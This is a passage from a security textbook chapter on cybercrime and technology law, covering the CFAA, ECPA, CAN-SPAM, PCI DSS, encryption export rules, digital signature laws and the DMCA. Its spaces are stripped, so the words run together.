SourcesofLawsIntheUnitedStates,threeprimarysourcesoflawsandregulationsaffectourlivesandgovernouractions.Astatutorylawispassedbyalegislativebranchofgovernment,beittheU.S.Congressoralocalcitycouncil.Anothersourceoflawsandregulationsisadministrativebodiesgivenpowerbyotherlegislation.Thepowerofgovernment-sponsoredagencies,suchastheEnvironmentalProtectionAgency(EPA),theFederalAviationAdministration(FAA),theFederalCommunicationCommission(FCC),andothers,liesinthispowerfulabilitytoenforcebehaviorsthroughadministrativerulemaking,oradministrativelaw.ThelastsourceoflawintheUnitedStatesiscommonlaw,orcaselaw,whichisbasedonpreviouseventsorprecedent.Thissourceoflawcomesfromthejudicialbranchofgovernment:judgesdecideontheapplicabilityoflawsandregulations.
ExamTip:Threetypesoflawsarecommonlyassociatedwithcybercrime:statutorylaw,administrativelaw,andcommonlaw(alsocalledcaselaw).
Allthreesourceshaveaninvolvementincomputersecurity.Specificstatutorylaws,suchastheComputerFraudandAbuseAct(CFAA),governbehavior.TheCFAAisdesignedtodealwithcasesofinterstatecomputerfraudandcasesofaccessingnationalsecurityinformation.Thelawhasbeenamendedseveraltimestokeeppacewithtechnology.TheprimarychargefromCFAAistypicallyoneofaccessingwithoutauthority,orexceedingauthorityon,asysteminvolvedwithinterstatecommerceornationalsecurity.Administratively,theFCCandFederalTradeCommission(FTC)havemadetheirpresencefeltintheInternetarenawithrespecttoissuessuchasintellectualpropertytheftandfraud.Commonlawcasesarenowworkingtheirwaysthroughthejudicialsystem,cementingtheissuesofcomputersandcrimesintothesystemofprecedentsandconstitutionalbasisoflaws.
ComputerTrespassWiththeadventofglobalnetworkconnectionsandtheriseoftheInternetasamethodofconnectingcomputersbetweenhomes,businesses,andgovernmentsacrosstheglobe,anewtypeofcriminaltrespasscannowbecommitted.Computertrespassistheunauthorizedentryintoacomputersystemviaanymeans,includingremotenetworkconnections.Thesecrimeshaveintroducedanewareaoflawthathasbothnationalandinternationalconsequences.Forcrimesthatarecommittedwithinacountry’sborders,nationallawsapply.Forcross-bordercrimes,internationallawsandinternationaltreatiesarethenorm.Computer-basedtrespasscanoccurevenifcountriesdonotshareaphysicalborder.Computertrespassistreatedasacrimeinmanycountries.Nationallaws
againstcomputetrespassexistinmanycountries,includingCanada,the
UnitedStates,andthememberstatesoftheEuropeanUnion(EU).Theselawsvarybycountry,buttheyallhavesimilarprovisionsdefiningtheunauthorizedentryintoanduseofcomputerresourcesforcriminalactivities.WhethercalledcomputermischiefasinCanadaorcomputertrespassasintheUnitedStates,unauthorizedentryanduseofcomputerresourcesistreatedasacrimewithsignificantpunishments.Withtheglobalizationofthecomputernetworkinfrastructure,orInternet,issuesthatcrossnationalboundarieshavearisenandwillcontinuetogrowinprominence.Someoftheseissuesaredealtwiththroughtheapplicationofnationallawsuponrequestofanothergovernment.Inthefuture,aninternationaltreatymaypavethewayforclosercooperation.
Computertrespassisaconvenientcatchalllawthatcanbeusedtoprosecutecybercriminalswhenevidenceofothercriminalbehavior,suchasonlinefraud,identitytheft,andsoforth,istooweaktoachieveaconviction.
ConventiononCybercrimeTheConventiononCybercrimeisthefirstinternationaltreatyoncrimescommittedviatheInternetandothercomputernetworks.TheconventionistheproductoffouryearsofworkbytheCouncilofEurope(CoE),butalsobytheUnitedStates,Canada,Japan,andothernon-CoEcountries.TheconventionhasbeenratifiedandcameintoforceinJuly2004,andbySeptember2006,15membernationshadalsoratifiedit.TheUnitedStatesratifieditinthesummerof2006,withitenteringintoforceintheUnitedStatesinJanuary2007.OneofthemainobjectivesoftheConvention,setoutinthepreamble,is
“topursue,asamatterofpriority,acommoncriminalpolicyaimedattheprotectionofsocietyagainstcybercrime,interalia,byadoptingappropriatelegislationandfosteringinternationalcooperation.”Thishasbecomeanimportantissuewiththeglobalizationofnetworkcommunication.Theabilitytocreateavirusanywhereintheworldand
escapeprosecutionbecauseofthelackoflocallawshasbecomeaglobalconcern.Theconventiondealsparticularlywithinfringementsofcopyright,
computer-relatedfraud,childpornography,andviolationsofnetworksecurity.Italsocontainsaseriesofpowersandprocedurescovering,forinstance,searchesofcomputernetworksanddatainterception.Ithasbeensupplementedbyanadditionalprotocolmakinganypublicationofracistandxenophobicpropagandaviacomputernetworksacriminaloffense.Thissupplementaladditionisintheprocessofseparateratification.Oneofthechallengesofenactingelementssuchasthisconventionis
thevaryinglegalandconstitutionalstructuresfromcountrytocountry.Simplestatementssuchasabanonchildpornography,althoughclearlydesirable,canrunintocomplicatingissues,suchasconstitutionalprotectionsoffreespeechintheUnitedStates.Becauseofsuchissues,thiswell-intendedjointagreementwillhavevariationsacrossthepoliticalboundariesoftheworld.
SignificantU.S.LawsTheUnitedStateshasbeenaleaderinthedevelopmentanduseofcomputertechnology.Assuch,ithasalongerhistoryassociatedwithcomputers,andwithcybercrime.Becauselegalsystemstendtobereactiveandmoveslowly,thisleadershippositionhastranslatedintoaleadershippositionfromalegalperspectiveaswell.Theoneadvantageofthislegalleadershippositionistheconceptthatonceanitemisidentifiedandhandledbythelegalsysteminonejurisdiction,subsequentadoptioninotherjurisdictionsistypicallyquicker.
ElectronicCommunicationsPrivacyAct(ECPA)TheElectronicCommunicationsPrivacyAct(ECPA)of1986waspassedbyCongressandsignedbyPresidentReagantoaddressamyriadoflegalprivacyissuesthatresultedfromtheincreasinguseofcomputersandothertechnologyspecifictotelecommunications.Sectionsofthislaw
addresse-mail,cellularcommunications,workplaceprivacy,andahostofotherissuesrelatedtocommunicatingelectronically.SectionIwasdesignedtomodifyfederalwiretapstatutestoincludeelectroniccommunications.SectionII,knownastheStoredCommunicationsAct(SCA),wasdesignedtoestablishcriminalsanctionsforunauthorizedaccesstostoredelectronicrecordsandcommunications.SectionIIIcoverspenregistersandtapandtraceissues.Tapandtraceinformationisrelatedtowhoiscommunicatingwithwhomandwhen.Penregisterdataistheconversationinformation.AmajorprovisionofECPAwastheprohibitionagainstanemployer’s
monitoringanemployee’scomputerusage,includinge-mail,unlessconsentisobtained(forexample,clickingYesonawarningbannerisconsideredconsent).Otherlegalprovisionsprotectelectroniccommunicationsfromwiretapandoutsideeavesdropping,asusersareassumedtohaveareasonableexpectationofprivacyandaffordedprotectionundertheFourthAmendmenttotheConstitution.
CrossCheckCybercrimeandPrivacyCybercrimeandprivacyareconceptsthatarefrequentlyinterconnected.Identitytheftisoneofthefastest-risingcrimes.HowdoesusingyourpersonalcomputertoaccesstheInternetincreaseyourriskintoday’sworld?Canyoulistadozenspecificrisksyouarepersonallyexposedto?Privacyissues,beingasignificanttopicintheirownright,arecoveredinChapter25.
Acommonpracticewithrespecttocomputeraccesstodayistheuseofawarningbanner.Thesebannersaretypicallydisplayedwheneveranetworkconnectionoccursandservefourmainpurposes.First,fromalegalstandpoint,theyestablishthelevelofexpectedprivacy(usuallynoneonabusinesssystem).Second,theyservenoticetoendusersoftheintenttoconductreal-timemonitoringfromabusinessstandpoint.Real-timemonitoringcanbeconductedforsecurityreasons,businessreasons,ortechnicalnetworkperformancereasons.Third,theyobtaintheuser’s
consenttomonitoring.Thekeyisthatthebannertellsusersthattheirconnectiontothenetworksignalstheirconsenttomonitoring.Consentcanalsobeobtainedtolookatfilesandrecords.Inthecaseofgovernmentsystems,consentisneededtopreventdirectapplicationoftheFourthAmendment.Andthelastreasonisthatthewarningbannercanestablishthesystemornetworkadministrator’scommonauthoritytoconsenttoalawenforcementsearch.
ComputerFraudandAbuseAct(1986)TheComputerFraudandAbuseAct(CFAA)of1986,amendedin1994,1996,in2001bytheUSAPatriotAct,andin2008bytheIdentityTheftEnforcementandRestitutionAct,servesasthecurrentfoundationforcriminalizingunauthorizedaccesstocomputersystems.CFAAmakesitacrimetoknowinglyaccessacomputerthatiseitherconsideredagovernmentcomputerorusedininterstatecommerce,ortouseacomputerinacrimethatisinterstateinnature,whichintoday’sInternet-connectedagecanbealmostanymachine.Theactsetsfinancialthresholdsfordefiningacriminalact,whichwereloweredbythePatriotAct,butinlightoftoday’sinvestigationcosts,theseareeasilymet.Theactalsomakesitacrimetoknowinglytransmitaprogram,code,orcommandthatresultsindamage.Traffickinginpasswordsorsimilaraccessinformationisalsocriminalized.Thisisawide-sweepingact,butthechallengeofprovingacasestillexists.
ControllingtheAssaultofNon-SolicitedPornographyAndMarketingActof2003(CAN-SPAM)TheCAN-SPAMActwasanattemptbytheU.S.governmenttoregulatecommerciale-mailbyestablishingnationalguidelinesandgivingtheFTCenforcementpowers.Theobjectiveofthelegislationwastocurbunsolicitedcommerciale-mail,orspam.Theacthasapplicabilitytomobilephonesaswell.Heraldedasactiontocurbtheriseofspam,sinceitsenactment,theacthasaverypoorrecord.
TechTip
HeaderManipulationFalsifyingheaderinformationisaseriousviolationoftheCAN-SPAMAct.ThiscanbeconsideredanindicatorofcriminalormaliciousintentandcanbringtheattentionofotherlawenforcementagenciesbesidestheFTC.
CAN-SPAMallowsunsolicitedcommerciale-mailaslongasitadherestothreerulesofcompliance:
UnsubscribeItmustincludeanobviousopt-outprovisiontoallowuserstounsubscribe,withtheserequestsbeinghonoredwithintendays.
ContentThecontentmustbeclearandnotdeceptive.Adultcontentmustbeclearlylabeled,andsubjectlinesmustbeclearandaccurate.
SendingbehaviorThesendermustnotuseharvestede-mailaddresses,falsifyheaders,oruseopenrelays.
CAN-SPAMmakesspecificexemptionsfore-mailpertainingtoreligiousmessages,politicalmessages,andnationalsecuritymessages.Thelawalsoblockspeoplewhoreceivespamfromsuingspammersandrestrictsstatesfromenactingandenforcingstrongerantispamstatutes.ThelawdoespermitISPstosuespammers,andthishasbeenusedbysomemajorISPstopursuecasesagainstlarge-scalespamoperations.MajorfirmssuchasAOLhaveconsideredthelawusefulintheirbattleagainstspam.Regardedlargelyasineffective,statisticshaveshownthatveryfewprosecutionshavebeenpursuedbytheFTC.Theactpermitsbothcriminalchargesagainstindividualsandcivilchargesagainstentitiesinvolvedinsuspectedspammingoperations.
USAPatriotAct
TheUSAPatriotActof2001,passedinresponsetotheSeptember11terroristattacksontheWorldTradeCenterinNewYorkCityandthePentagonbuildinginArlington,Virginia,substantiallychangedthelevelsofchecksandbalancesinlawsrelatedtoprivacyintheUnitedStates.ThislawextendsthetapandtraceprovisionsofexistingwiretapstatutestotheInternetandmandatescertaintechnologicalmodificationsatISPstofacilitateelectronicwiretapsontheInternetandforISPstocooperatewiththegovernmenttoaidmonitoring.TheactalsopermitstheJusticeDepartmenttoproceedwithitsrolloutoftheCarnivoreprogram,aneavesdroppingprogramfortheInternet.MuchcontroversyexistsoverCarnivore,butuntilit’schanged,thePatriotActmandatesthatISPscooperateandfacilitatemonitoring.Inrecentactions,thenameCarnivorehasbeenretired,buttherightofthegovernmenttoeavesdropandmonitorcommunicationscontinuestobeahottopicandonewhereactionscontinue.ThePatriotActalsopermitsfederallawenforcementpersonneltoinvestigatecomputertrespass(intrusions)andenactscivilpenaltiesfortrespassers.
TechTip
ComputerMisuseTwomajorlaws,ECPAandCFAA(asamended),providewide-sweepingtoolsforlawenforcementtoconvictpeoplewhohackintocomputersorusethemtostealinformation.Bothlawshavebeenstrengthenedandprovidesignificantfederalpenalties.Theselawsarecommonlyusedtoconvictcriminalsofcomputermisuse,evenwhenotherchargesmayhaveapplied.
Gramm-Leach-BlileyAct(GLBA)InNovember1999,PresidentClintonsignedtheGramm-Leach-BlileyAct(GLBA),amajorpieceoflegislationaffectingthefinancialindustrythatincludessignificantprivacyprovisionsforindividuals.ThekeyprivacytenetsenactedinGLBAincludetheestablishmentofanopt-outmethodforindividualstomaintainsomecontrolovertheuseofthe
informationprovidedinabusinesstransactionwithamemberofthefinancialcommunity.GLBAisenactedthroughaseriesofrulesgovernedbystatelaw,federallaw,securitieslaw,andfederalrules.Theserulescoverawiderrangeoffinancialinstitutions,frombanksandthrifts,toinsurancecompanies,tosecuritiesdealers.SomeinternalinformationsharingisrequiredundertheFairCreditReportingAct(FCRA)betweenaffiliatedcompanies,butGLBAendedsharingtoexternalthird-partyfirms.
Sarbanes-OxleyAct(SOX)Inthewakeofseveralhigh-profilecorporateaccounting/financialscandalsintheUnitedStates,thefederalgovernmentin2002passedsweepinglegislation,theSarbanes-OxleyAct(SOX),overhaulingthefinancialaccountingstandardsforpubliclytradedfirmsintheUnitedStates.Thesechangeswerecomprehensive,touchingmostaspectsofbusinessinonewayoranother.Withrespecttoinformationsecurity,oneofthemostprominentchangeswastheprovisionofSection404controls,whichspecifythatallprocessesassociatedwiththefinancialreportingofafirmmustbecontrolledandauditedonaregularbasis.Sincethemajorityoffirmsusecomputerizedsystems,thisplacesinternalauditorsintotheITshops,verifyingthatthesystemshaveadequatecontrolstoensuretheintegrityandaccuracyoffinancialreporting.Thesecontrolshaveresultedincontroversyoverthecostofmaintainingthemversustheriskofnotusingthem.Section404requiresfirmstoestablishacontrol-basedframework
designedtodetectorpreventfraudthatwouldresultinmisstatementoffinancials.Insimpleterms,thesecontrolsshoulddetectinsideractivitythatwoulddefraudthefirm.Thishassignificantimpactsontheinternalsecuritycontrols,becauseasystemadministratorwithroot-levelaccesscouldperformmanyifnotalltasksassociatedwithfraudandwouldhavetheabilitytoalterlogsandcoverhistracks.Likewise,certainlevelsofpowerusersoffinancialaccountingprogramswouldalsohavesignificantcapabilitytoalterrecords.
PrivacyLawsThereisawiderangeofprivacylawsthatarerelevanttocomputers.Therearelawsforhealthcare(HIPAA)andeducationrecords(FERPA),aswellasothertypesofrecordsincludingvideorentalrecords.TheselawsaredescribedindetailinChapter25.
PaymentCardIndustryDataSecurityStandard(PCIDSS)Thepaymentcardindustry,includingthepowerhousesofMasterCardandVisa,throughitsPCISecurityStandardsCouncildesignedaprivate-sectorinitiativetoprotectpaymentcardinformationbetweenbanksandmerchants.ThePaymentCardIndustryDataSecurityStandard(PCIDSS)isasetofcontractualrulesgoverninghowcreditcarddataistobeprotected(seetheTechTipsidebar“PCIDSSObjectivesandRequirements”).Thecurrentversionis3.1,whichwasreleasedinApril2015.Thisisavoluntary,private-sectorinitiativethatisproscriptiveinitssecurityguidance.Merchantsandvendorscanchoosenottoadoptthesemeasures,butthestandardhasasteeppricefornoncompliance;thetransactionfeefornoncompliantvendorscanbesignificantlyhigher,finesupto$500,000canbelevied,andinextremecasestheabilitytoprocesscreditcardscanberevoked.
TechTip
PCIDSSObjectivesandRequirementsPCIDSSv3includessixcontrolobjectivescontainingatotalof12requirements:
1.BuildandMaintainaSecureNetworkRequirement1Installandmaintainafirewallconfigurationtoprotectcardholderdata
Requirement2Donotusevendor-supplieddefaultsforsystempasswordsandothersecurityparameters
2.ProtectCardholderDataRequirement3ProtectstoredcardholderdataRequirement4Encrypttransmissionofcardholderdataacrossopen,publicnetworks
3.MaintainaVulnerabilityManagementProgramRequirement5ProtectallsystemsagainstmalwareandregularlyupdateantivirussoftwareorprogramsRequirement6Developandmaintainsecuresystemsandapplications
4.ImplementStrongAccessControlMeasuresRequirement7Restrictaccesstocardholderdatabybusinessneed-to-knowRequirement8Identifyandauthenticateaccesstosystemcomponents
Requirement9Restrictphysicalaccesstocardholderdata
5.RegularlyMonitorandTestNetworksRequirement10Trackandmonitorallaccesstonetworkresourcesandcardholderdata
Requirement11Regularlytestsecuritysystemsandprocesses
6.MaintainanInformationSecurityPolicyRequirement12Maintainapolicythataddressesinformationsecurityforallpersonnel
PCIDSShastwodefinedtypesofinformation,cardholderdataandsensitiveauthenticationdata.TheprotectionrequirementsestablishedfortheseelementsaredetailedinTable24.1.
Table24.1 PCIDSSDataRetentionGuidelines
Import/ExportEncryptionRestrictionsEncryptiontechnologyhasbeencontrolledbygovernmentsforavarietyofreasons.Thelevelofcontrolvariesfromoutrightbanningtolittleornoregulation.Thereasonsbehindthecontrolvaryaswell,andcontroloverimportandexportisavitalmethodofmaintainingalevelofcontroloverencryptiontechnologyingeneral.Themajorityofthelawsandrestrictionsarecenteredontheuseofcryptography,whichwasuntilrecentlyusedmainlyformilitarypurposes.TheadventofcommercialtransactionsandnetworkcommunicationsoverpublicnetworkssuchastheInternethasexpandedtheuseofcryptographicmethodstoincludesecuringofnetworkcommunications.Asisthecaseinmostrapidlychangingtechnologies,thepracticemovesfasterthanlaw.Manycountriesstillhavelawsthatareoutmodedintermsofe-commerceandtheInternet.Overtime,theselaws
willbechangedtoservethesenewusesinawayconsistentwitheachcountry’sneeds.
U.S.LawExportcontrolsoncommercialencryptionproductsareadministeredbytheBureauofIndustryandSecurity(BIS)intheU.S.DepartmentofCommerce.TheresponsibilityforexportcontrolandjurisdictionwastransferredfromtheStateDepartmenttotheCommerceDepartmentin1996andupdatedonJune6,2002.RulesgoverningexportsofencryptionarefoundintheExportAdministrationRegulations(EAR),15C.F.R.Parts730–774.Sections740.13,740.17,and742.15aretheprincipalreferencesfortheexportofencryptionitems.
TechTip
WassenaarArrangementTheUnitedStatesupdateditsencryptionexportregulationstoprovidetreatmentconsistentwithregulationsadoptedbytheEuropeanUnion,easingexportandre-exportrestrictionsamongtheEUmemberstatesandArgentina,Australia,Canada,Croatia,Japan,NewZealand,Norway,RepublicofKorea,Russia,SouthAfrica,Switzerland,Turkey,Ukraine,andtheUnitedStates.ThemembernationsoftheWassenaarArrangementagreedtoremovekey-lengthrestrictionsonencryptionhardwareandsoftwarethatissubjecttocertainreasonablelevelsofencryptionstrength.Thisactioneffectivelyremoved“mass-market”encryptionproductsfromthelistofdual-useitemscontrolledbytheWassenaarArrangement.
Violationofencryptionexportregulationsisaseriousmatterandisnotanissuetotakelightly.Untilrecently,encryptionprotectionwasaccordedthesamelevelofattentionastheexportofweaponsforwar.WiththeriseoftheInternet,widespreadpersonalcomputing,andtheneedforsecureconnectionsfore-commerce,thispositionhasrelaxedsomewhat.TheU.S.encryptionexportcontrolpolicycontinuestorestonthree
principles:reviewofencryptionproductspriortosale,streamlinedpost-exportreporting,andlicensereviewofcertainexportsofstrongencryption
toforeigngovernmentendusers.ThecurrentsetofU.S.rulesrequiresnotificationtotheBISforexportinallcases,buttherestrictionsaresignificantlylessenedformass-marketproducts,asdefinedbyallofthefollowing:
Theyaregenerallyavailabletothepublicbybeingsold,withoutrestriction,fromstockatretailsellingpointsbyanyofthesemeans:
Over-the-countertransactions
Mail-ordertransactions
Electronictransactions
Telephonecalltransactions
Thecryptographicfunctionalitycannoteasilybechangedbytheuser.
Theyaredesignedforinstallationbytheuserwithoutfurthersubstantialsupportbythesupplier.
Whennecessary,detailsoftheitemsareaccessibleandwillbeprovided,uponrequest,totheappropriateauthorityintheexporter’scountryinordertoascertaincompliancewithexportregulations.
Mass-marketcommoditiesandsoftwareemployingakeylengthgreaterthan64bitsforthesymmetricalgorithmmustbereviewedinaccordancewithBISregulations.RestrictionsonexportsbyU.S.personstoterrorist-supportingstates,asdeterminedbytheU.S.DepartmentofState(currentlyIran,Sudan,andSyria),theirnationals,andothersanctionedentitiesarenotchangedbythisrule.
Asyoucansee,thisisaverytechnicalarea,withsignificantrulesandsignificantpenaltiesforinfractions.Thebestruleisthatwheneveryouarefacedwithasituationinvolvingtheexportofencryption-containingsoftware,firstconsultanexpertandgettheappropriatepermissionorastatementthatpermissionisnotrequired.Thisisonecasewhereitisbetter
tobesafethansorry.
Non-U.S.LawsExportcontrolrulesforencryptiontechnologiesfallundertheWassenaarArrangement,aninternationalarrangementonexportcontrolsforconventionalarmsanddual-usegoodsandtechnologies(seetheTechTipsidebar,“WassenaarArrangement”).TheWassenaarArrangementwasestablishedtocontributetoregionalandinternationalsecurityandstabilitybypromotingtransparencyandgreaterresponsibilityintransfersofconventionalarmsanddual-usegoodsandtechnologies,thuspreventingdestabilizingaccumulations.Participatingstates,ofwhichtheUnitedStatesisoneof41,willseek,throughtheirownnationalpoliciesandlaws,toensurethattransfersoftheseitemsdonotcontributetothedevelopmentorenhancementofmilitarycapabilitiesthatunderminethesegoals,andarenotdivertedtosupportsuchcapabilities.
TechTip
CryptographicUseRestrictionsInadditiontotheexportcontrolsoncryptography,significantlawsprohibittheuseandpossessionofcryptographictechnology.InChina,alicensefromthestateisrequiredforcryptographicuse.Insomeothercountries,includingRussia,Pakistan,Venezuela,andSingapore,tightrestrictionsapplytocryptographicuses.Francerelinquishedtightstatecontroloverthepossessionofthetechnologyin1999.OneofthedrivingpointsbehindFrance’sactionisthefactthatmoreandmoreoftheInternettechnologieshavebuilt-incryptography.
ManynationshavemorerestrictivepoliciesthanthoseagreeduponaspartoftheWassenaarArrangement.Australia,NewZealand,UnitedStates,France,andRussiagofurtherthanisrequiredunderWassenaarandrestrictgeneral-purposecryptographicsoftwareasdual-usegoodsthroughnationallaws.TheWassenaarArrangementhashadasignificantimpact
oncryptographyexportcontrols,andthereseemslittledoubtthatsomeofthenationsrepresentedwillseektousethenextroundtomovetowardamorerepressivecryptographyexportcontrolregimebasedontheirownnationallaws.Thereareongoingcampaignstoattempttoinfluenceothermembersoftheagreementtowardlessrestrictiverulesor,insomecases,norules.Theselobbyingeffortsarebasedone-commerceandprivacyarguments.Digitalrightsmanagement,secureUSBsolutions,digitalsignatures,and
SecureSocketsLayer(SSL)–securedconnectionsareexamplesofcommonbehind-the-scenesuseofcryptographictechnologies.In2007,theUnitedKingdompassedanewlawmandatingthatwhenrequestedbyUKauthorities,eitherpoliceormilitary,encryptionkeysmustbeprovidedtopermitdecryptionofinformationassociatedwithterrororcriminalinvestigation.Failuretodelivereitherthekeysordecrypteddatacanresultinanautomaticprisonsentenceoftwotofiveyears.Althoughthisseemsreasonable,ithasbeenarguedthatsuchactionswilldrivecertainfinancialentitiesoffshore,astheruleappliesonlytodatahousedintheUnitedKingdom.Asfordeterrence,thetwo-yearsentencemaybelighterthanaconvictionfortraffickinginchildpornography;hencethelawseemsnottobeasusefulasitseemsatfirstglance.
DigitalSignatureLawsWhetheraringandwaxseal,astamp,orascrawlindicatinganame,signatureshavebeenusedtoaffixasignofone’sapprovalforcenturies.Ascommunicationshavemovedintothedigitalrealm,signaturesneedtoevolvewiththenewmedium,andhencedigitalsignatureswereinvented.Usingelementsofcryptographytoestablishintegrityandnonrepudiation,digitalsignatureschemescanactuallyoffermorefunctionalitythantheirpredecessorsinthepaper-basedworld.
U.S.DigitalSignatureLawsOnOctober1,2000,theElectronicSignaturesinGlobalandNational
CommerceAct(commonlycalledtheE-Signlaw)wentintoeffectintheUnitedStates.Thislawimplementsasimpleprinciple:asignature,contract,orotherrecordmaynotbedeniedlegaleffect,validity,orenforceabilitysolelybecauseitisinelectronicform.AnothersourceoflawondigitalsignaturesistheUniformElectronicTransactionsAct(UETA),whichwasdevelopedbytheNationalConferenceofCommissionersonUniformStateLaws(NCCUSL)andhasbeenadoptedinallbutfourstates—Georgia,Illinois,NewYork,andWashington—whichhaveadoptedanon-uniformversionofUETA.ThepreciserelationshipbetweenthefederalE-SignlawandUETAhasyettoberesolvedandwillmostlikelybeworkedoutthroughlitigationinthecourtsovercomplextechnicalissues.Manystateshaveadopteddigitalsignaturelaws,thefirstbeingUtahin
1995.TheUtahlaw,whichhasbeenusedasamodelbyseveralotherstates,confirmsthelegalstatusofdigitalsignaturesasvalidsignatures,providesforuseofstate-licensedcertificationauthorities,endorsestheuseofpublickeyencryptiontechnology,andauthorizesonlinedatabasescalledrepositories,wherepublickeyswouldbeavailable.TheUtahactspecifiesanegligencestandardregardingprivateencryptionkeysandplacesnolimitonliability.Thus,ifacriminalusesaconsumer’sprivatekeytocommitfraud,theconsumerisfinanciallyresponsibleforthatfraud,unlesstheconsumercanprovethatheorsheusedreasonablecareinsafeguardingtheprivatekey.Consumersassumeadutyofcarewhentheyadopttheuseofdigitalsignaturesfortheirtransactions,notunlikethecarerequiredforPINsondebitcards.
TryThis!
DigitalSignatureAgreementsDigitalsignaturesarebecomingmorecommonineverydayuse.Whenapersonsignsupwithabankforelectronicbankingservices,orwithabrokerageaccountforonlinetrading,thatpersontypicallyagreestoelectronicsignatures.Usingyourbankorbrokerageaccount—orifyoudon’thaveone,therearefreeonlinefinancialservicefirmsyoucansignupfor—review
theonlineagreementforelectronicsignatureprovisions.
Fromapracticalstandpoint,theexistenceoftheE-SignlawandUETAhasenablede-commercetransactionstoproceed,andtheresolutionofthetechnicaldetailsviacourtactionswillprobablyhavelittleeffectonconsumersbeyondtheneedtoexercisereasonablecareovertheirsignaturekeys.Forthemostpart,softwarewillhandletheseissuesforthetypicaluser.
UNDigitalSignatureLawsTheUnitedNationshasamandatetofurtherharmonizeinternationaltrade.Withthisinmind,theUNGeneralAssemblyadoptedin1996theUnitedNationsCommissiononInternationalTradeLaw(UNCITRAL)ModelLawonElectronicCommerce.Toimplementspecifictechnicalaspectsofthismodellaw,moreworkonelectronicsignatureswasneeded.TheGeneralAssemblythenadoptedin2001theUNCITRALModelLawonElectronicSignatures.Thesemodellawshavebecomethebasisformanynationalandinternationaleffortsinthisarea.
CanadianDigitalSignatureLawsCanadawasanearlyleaderintheuseofdigitalsignatures.Singapore,Canada,andtheU.S.stateofPennsylvaniawerethefirstgovernmentstohavedigitallysignedaninterstatecontract.Thiscontract,digitallysignedin1998,concernedtheestablishmentofaGlobalLearningConsortiumbetweenthethreegovernments(source:Krypto-DigestVol.1,No.749,June11,1998).Canadawentontoadoptanationalmodelbillforelectronicsignaturestopromotee-commerce.Thisbill,theUniformElectronicCommerceAct(UECA),allowstheuseofelectronicsignaturesincommunicationswiththegovernment.Thelawcontainsgeneralprovisionsfortheequivalencebetweentraditionalandelectronicsignatures(source:BNAECLR,May27,1998,p.700)andismodeledaftertheUNCITRALModelLawonE-Commerce(source:BNAECLR,
September13,2000,p.918).TheUECAissimilartoBillC-54,PersonalInformationProtectionandElectronicDocumentsAct(PIPEDA),inauthorizinggovernmentstouseelectronictechnologytodeliverservicesandcommunicatewithcitizens.IndividualCanadianprovinceshavepassedsimilarlegislationdefining
digitalsignatureprovisionsfore-commerceandgovernmentuse.TheselawsaremodeledaftertheUNCITRALModelLawonE-Commercetoenablewidespreaduseofe-commercetransactions.Theselawshavealsomodifiedthemethodsofinteractionsbetweenthecitizensandthegovernment,enablingelectroniccommunicationinadditiontopreviousforms.
EuropeanLawsTheEuropeanCommissionadoptedaCommunicationonDigitalSignaturesandEncryption:“EnsuringSecurityandTrustinElectronicCommunication—TowardsaEuropeanFrameworkforDigitalSignaturesandEncryption.”ThiscommunicationstatesthatacommonframeworkattheEUlevelisurgentlyneededtostimulate“thefreecirculationofdigitalsignaturerelatedproductsandserviceswithintheInternalmarket”and“thedevelopmentofneweconomicactivitieslinkedtoelectroniccommerce”aswellas“tofacilitatetheuseofdigitalsignaturesacrossnationalborders.”Communitylegislationshouldaddresscommonlegalrequirementsforcertificateauthorities,legalrecognitionofdigitalsignatures,andinternationalcooperation.Thiscommunicationwasdebated,andacommonpositionwaspresentedtothemembernationsforincorporationintonationallaws.OnMay4,2000,theEuropeanParliamentandCouncilapprovedthe
commonpositionadoptedbythecouncil.InJune2000,thefinalversion,theElectronicCommerceDirective(2000/31/EC),wasadopted.Thedirectivehasbeenimplementedbymemberstates.Toimplementthearticlescontainedinthedirective,memberstateshadtoremovebarriers,suchaslegalformrequirements,toelectroniccontracting,leadingtouniformdigitalsignaturelawsacrosstheEU.
DigitalRightsManagementTheabilitytomakeflawlesscopiesofdigitalmediahasledtoanother“new”legalissue.Foryears,themusicandvideoindustryhasreliedontechnologytoprotectitsrightswithrespecttointellectualproperty.Ithasbeenillegalfordecadestocopyinformation,suchasmusicandvideos,protectedbycopyright.Evenwiththelaw,peoplehaveforyearsmadecopiesofmusicandvideostoshare,violatingthelaw.Untiltheadventofdigitalcopies(seeTechTipsidebar“DigitalCopiesandCopyright”),thisdidnotrepresentasignificanteconomicimpactintheeyesoftheindustry,asthecopieswereoflesserqualityandpeoplewouldpayfororiginalqualityinsufficientnumberstokeeptheeconomicsoftheindustryhealthy.Assuch,legalactionagainstpiracywastypicallylimitedtolarge-scaleduplicationandsaleefforts,commonlyperformedoverseasandsubsequentlyshippedtotheUnitedStatesascounterfeititems.
TechTip
DigitalCopiesandCopyrightTheabilityofanyonewithaPCtomakeaperfectcopyofdigitalmedialedtoindustryfearsthatindividualpiracyactionscouldcausemajoreconomicissuesintherecordingindustry.Toprotecttherightsoftherecordingartistsandtheeconomichealthoftheindustryasawhole,themusicandvideorecordingindustrylobbiedtheU.S.Congressforprotection,whichwasgrantedundertheDigitalMillenniumCopyrightAct(DMCA)onOctober20,1998.
TheprimarystatuteenactedintheUnitedStatestobringcopyrightlegalconcernsuptodatewiththedigitalworldistheDigitalMillenniumCopyrightAct(DMCA).TheDMCAstatesitspurposeasfollows:“Toamendtitle17,UnitedStatesCode,toimplementtheWorldIntellectualPropertyOrganizationCopyrightTreatyandPerformancesandPhonogramsTreaty,andforotherpurposes.”Themajorityofthislawwaswellcrafted,butonesectionhasdrawnconsiderablecommentand
criticism.Asectionofthelawmakesitillegaltodevelop,produce,andtradeanydeviceormechanismdesignedtocircumventtechnologicalcontrolsusedincopyprotection.
TechTip
DMCAResearchExemptionRequirementsTheDMCAhasspecificexemptionsforresearch,providedfourelementsaresatisfied:
Thepersonlawfullyobtainedtheencryptedcopy,phonorecord,performance,ordisplayofthepublishedwork.
Suchactisnecessarytoconductsuchencryptionresearch.
Thepersonmadeagoodfaithefforttoobtainauthorizationbeforethecircumvention.Suchactdoesnotconstituteinfringementunderthistitleoraviolationofapplicablelawotherthanthissection,includingsection1030oftitle18andthoseprovisionsoftitle18amendedbytheComputerFraudandAbuseActof1986.
